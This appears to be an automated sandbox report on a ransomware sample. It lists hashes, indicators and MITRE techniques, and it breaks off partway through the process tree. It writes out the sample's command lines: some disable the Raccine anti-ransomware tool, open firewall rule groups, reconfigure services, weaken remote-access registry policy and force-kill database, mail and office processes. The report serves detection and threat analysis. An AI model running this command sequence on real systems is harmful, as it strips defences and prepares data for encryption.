fedb39ac98c39b688703f1968405d75432d881ff34405d3087a989440735aa8e

Resubmissions

28-10-2021 15:44

211028-s6m55agfbk 10

10-10-2021 17:01

211010-vjzlragafj 8

Analysis

max time kernel
125s
max time network
127s
platform
windows10_x64
resource
win10-en-20211014
submitted
28-10-2021 15:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

iE8JUAJp7.bin.exe
Size

385KB
MD5

a9a0fae4766d9f7cafa1560f5f62e46f
SHA1

d582608dc07bd9f771334cdb60626755997dd56c
SHA256

f70966e32d18a1e2ed51ebdcc6b985d8f7613febf0680639076c71ebeab6a350
SHA512

5c2f89a16c5291d509f41bd5f12d18a386892738cfd5fb5cbd2156c52d46f28abde5f199461fe9a8bf3aa3f7e4644fe66c3ad48c3b114b792efdbf421468856b

Score

8^/10

evasion persistence ransomware

Malware Config

Signatures

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Downloads PsExec from SysInternals website 1 IoCs

Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

description	flow	ioc
HTTP URL	32	http://live.sysinternals.com/PsExec.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\RepairExit.png.cyber	iE8JUAJp7.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SaveExit.tiff	iE8JUAJp7.bin.exe
File renamed	C:\Users\Admin\Pictures\SaveExit.tiff => C:\Users\Admin\Pictures\SaveExit.tiff.cyber	iE8JUAJp7.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SaveExit.tiff.cyber	iE8JUAJp7.bin.exe
File renamed	C:\Users\Admin\Pictures\RepairExit.png => C:\Users\Admin\Pictures\RepairExit.png.cyber	iE8JUAJp7.bin.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\K:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\M:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\T:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\I:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\O:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\H:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\A:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\G:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\Z:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\B:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\W:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\E:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\U:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\P:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\N:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\F:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\L:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\X:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\Q:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\R:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\Y:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\S:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\V:	iE8JUAJp7.bin.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	iE8JUAJp7.bin.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

pid	Process
872	taskkill.exe
3000	taskkill.exe
4032	taskkill.exe
2312	taskkill.exe
3820	taskkill.exe
2996	taskkill.exe
3864	taskkill.exe
516	taskkill.exe
3264	taskkill.exe
3656	taskkill.exe
1796	taskkill.exe
2876	taskkill.exe
1696	taskkill.exe
1240	taskkill.exe
3864	taskkill.exe
3660	taskkill.exe
3208	taskkill.exe
1040	taskkill.exe
3448	taskkill.exe
608	taskkill.exe
3520	taskkill.exe
2872	taskkill.exe
2124	taskkill.exe
676	taskkill.exe
1752	taskkill.exe
968	taskkill.exe
2224	taskkill.exe
1680	taskkill.exe
3956	taskkill.exe
3544	taskkill.exe
3780	taskkill.exe
1552	taskkill.exe
3132	taskkill.exe
1160	taskkill.exe
4088	taskkill.exe
3892	taskkill.exe
2404	taskkill.exe
956	taskkill.exe
1436	taskkill.exe
3580	taskkill.exe
1796	taskkill.exe
1332	taskkill.exe
3608	taskkill.exe
3188	taskkill.exe
3688	taskkill.exe
1368	taskkill.exe
3400	taskkill.exe
2420	taskkill.exe
2244	taskkill.exe
1012	taskkill.exe
3320	taskkill.exe
892	taskkill.exe
1056	taskkill.exe
3920	taskkill.exe
3936	taskkill.exe
1136	taskkill.exe
2196	taskkill.exe
2364	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3092	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3680	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

description	pid	Process
Token: SeDebugPrivilege	2636	iE8JUAJp7.bin.exe
Token: SeDebugPrivilege	2636	iE8JUAJp7.bin.exe
Token: SeDebugPrivilege	516	taskkill.exe
Token: SeDebugPrivilege	1056	taskkill.exe
Token: SeDebugPrivilege	2244	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	4032	taskkill.exe
Token: SeDebugPrivilege	3608	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeDebugPrivilege	3264	taskkill.exe
Token: SeDebugPrivilege	3920	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	1240	taskkill.exe
Token: SeDebugPrivilege	3864	taskkill.exe
Token: SeDebugPrivilege	3660	taskkill.exe
Token: SeDebugPrivilege	2404	taskkill.exe
Token: SeDebugPrivilege	3936	taskkill.exe
Token: SeDebugPrivilege	3956	taskkill.exe
Token: SeDebugPrivilege	1136	taskkill.exe
Token: SeDebugPrivilege	4088	taskkill.exe
Token: SeDebugPrivilege	3688	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	2312	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	3400	taskkill.exe
Token: SeDebugPrivilege	3448	taskkill.exe
Token: SeDebugPrivilege	1436	taskkill.exe
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeDebugPrivilege	3580	taskkill.exe
Token: SeDebugPrivilege	676	taskkill.exe
Token: SeDebugPrivilege	608	taskkill.exe
Token: SeDebugPrivilege	3320	taskkill.exe
Token: SeDebugPrivilege	892	taskkill.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	1680	taskkill.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	3656	taskkill.exe
Token: SeDebugPrivilege	2996	taskkill.exe
Token: SeDebugPrivilege	3520	taskkill.exe
Token: SeDebugPrivilege	3208	taskkill.exe
Token: SeDebugPrivilege	872	taskkill.exe
Token: SeDebugPrivilege	2872	taskkill.exe
Token: SeDebugPrivilege	1332	taskkill.exe
Token: SeDebugPrivilege	3780	taskkill.exe
Token: SeDebugPrivilege	2876	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	3132	taskkill.exe
Token: SeDebugPrivilege	2420	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	3544	taskkill.exe
Token: SeDebugPrivilege	3000	taskkill.exe
Token: SeDebugPrivilege	1368	taskkill.exe
Token: SeDebugPrivilege	3864	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	2964	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2636 wrote to memory of 516	2636	iE8JUAJp7.bin.exe	69
PID 2636 wrote to memory of 516	2636	iE8JUAJp7.bin.exe	69
PID 2636 wrote to memory of 516	2636	iE8JUAJp7.bin.exe	69
PID 2636 wrote to memory of 1988	2636	iE8JUAJp7.bin.exe	71
PID 2636 wrote to memory of 1988	2636	iE8JUAJp7.bin.exe	71
PID 2636 wrote to memory of 1988	2636	iE8JUAJp7.bin.exe	71
PID 2636 wrote to memory of 3092	2636	iE8JUAJp7.bin.exe	73
PID 2636 wrote to memory of 3092	2636	iE8JUAJp7.bin.exe	73
PID 2636 wrote to memory of 3092	2636	iE8JUAJp7.bin.exe	73
PID 2636 wrote to memory of 2224	2636	iE8JUAJp7.bin.exe	75
PID 2636 wrote to memory of 2224	2636	iE8JUAJp7.bin.exe	75
PID 2636 wrote to memory of 2224	2636	iE8JUAJp7.bin.exe	75
PID 2636 wrote to memory of 3488	2636	iE8JUAJp7.bin.exe	77
PID 2636 wrote to memory of 3488	2636	iE8JUAJp7.bin.exe	77
PID 2636 wrote to memory of 3488	2636	iE8JUAJp7.bin.exe	77
PID 2636 wrote to memory of 2280	2636	iE8JUAJp7.bin.exe	79
PID 2636 wrote to memory of 2280	2636	iE8JUAJp7.bin.exe	79
PID 2636 wrote to memory of 2280	2636	iE8JUAJp7.bin.exe	79
PID 2636 wrote to memory of 732	2636	iE8JUAJp7.bin.exe	80
PID 2636 wrote to memory of 732	2636	iE8JUAJp7.bin.exe	80
PID 2636 wrote to memory of 732	2636	iE8JUAJp7.bin.exe	80
PID 2636 wrote to memory of 2888	2636	iE8JUAJp7.bin.exe	81
PID 2636 wrote to memory of 2888	2636	iE8JUAJp7.bin.exe	81
PID 2636 wrote to memory of 2888	2636	iE8JUAJp7.bin.exe	81
PID 2636 wrote to memory of 208	2636	iE8JUAJp7.bin.exe	85
PID 2636 wrote to memory of 208	2636	iE8JUAJp7.bin.exe	85
PID 2636 wrote to memory of 208	2636	iE8JUAJp7.bin.exe	85
PID 2636 wrote to memory of 376	2636	iE8JUAJp7.bin.exe	87
PID 2636 wrote to memory of 376	2636	iE8JUAJp7.bin.exe	87
PID 2636 wrote to memory of 376	2636	iE8JUAJp7.bin.exe	87
PID 2636 wrote to memory of 720	2636	iE8JUAJp7.bin.exe	89
PID 2636 wrote to memory of 720	2636	iE8JUAJp7.bin.exe	89
PID 2636 wrote to memory of 720	2636	iE8JUAJp7.bin.exe	89
PID 2636 wrote to memory of 2440	2636	iE8JUAJp7.bin.exe	91
PID 2636 wrote to memory of 2440	2636	iE8JUAJp7.bin.exe	91
PID 2636 wrote to memory of 2440	2636	iE8JUAJp7.bin.exe	91
PID 2636 wrote to memory of 504	2636	iE8JUAJp7.bin.exe	93
PID 2636 wrote to memory of 504	2636	iE8JUAJp7.bin.exe	93
PID 2636 wrote to memory of 504	2636	iE8JUAJp7.bin.exe	93
PID 2636 wrote to memory of 1056	2636	iE8JUAJp7.bin.exe	95
PID 2636 wrote to memory of 1056	2636	iE8JUAJp7.bin.exe	95
PID 2636 wrote to memory of 1056	2636	iE8JUAJp7.bin.exe	95
PID 2636 wrote to memory of 2244	2636	iE8JUAJp7.bin.exe	96
PID 2636 wrote to memory of 2244	2636	iE8JUAJp7.bin.exe	96
PID 2636 wrote to memory of 2244	2636	iE8JUAJp7.bin.exe	96
PID 2636 wrote to memory of 1160	2636	iE8JUAJp7.bin.exe	97
PID 2636 wrote to memory of 1160	2636	iE8JUAJp7.bin.exe	97
PID 2636 wrote to memory of 1160	2636	iE8JUAJp7.bin.exe	97
PID 2636 wrote to memory of 4032	2636	iE8JUAJp7.bin.exe	101
PID 2636 wrote to memory of 4032	2636	iE8JUAJp7.bin.exe	101
PID 2636 wrote to memory of 4032	2636	iE8JUAJp7.bin.exe	101
PID 2636 wrote to memory of 2124	2636	iE8JUAJp7.bin.exe	102
PID 2636 wrote to memory of 2124	2636	iE8JUAJp7.bin.exe	102
PID 2636 wrote to memory of 2124	2636	iE8JUAJp7.bin.exe	102
PID 2636 wrote to memory of 3608	2636	iE8JUAJp7.bin.exe	105
PID 2636 wrote to memory of 3608	2636	iE8JUAJp7.bin.exe	105
PID 2636 wrote to memory of 3608	2636	iE8JUAJp7.bin.exe	105
PID 2636 wrote to memory of 1040	2636	iE8JUAJp7.bin.exe	107
PID 2636 wrote to memory of 1040	2636	iE8JUAJp7.bin.exe	107
PID 2636 wrote to memory of 1040	2636	iE8JUAJp7.bin.exe	107
PID 2636 wrote to memory of 3264	2636	iE8JUAJp7.bin.exe	109
PID 2636 wrote to memory of 3264	2636	iE8JUAJp7.bin.exe	109
PID 2636 wrote to memory of 3264	2636	iE8JUAJp7.bin.exe	109
PID 2636 wrote to memory of 3920	2636	iE8JUAJp7.bin.exe	111

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	iE8JUAJp7.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	iE8JUAJp7.bin.exe

C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe
"C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2636
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:516
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1988
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:3092
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:2224
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  - Drops file in Windows directory
  PID:3488
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:2280
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:732
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:2888
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:208
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:376
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:720
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:2440
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:504
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1056
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2244
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1160
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4032
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2124
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3608
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1040
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3264
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3920
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3188
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1240
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3864
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3660
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2404
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3956
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3936
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1136
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4088
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3688
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:956
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:1796
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2312
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3892
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3400
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3448
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1436
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1012
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:2196
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3820
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3580
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:676
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:608
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3320
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:892
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2224
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:3464
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1680
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1796
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3656
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2996
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3520
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:1008
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3208
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:872
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2872
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1332
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
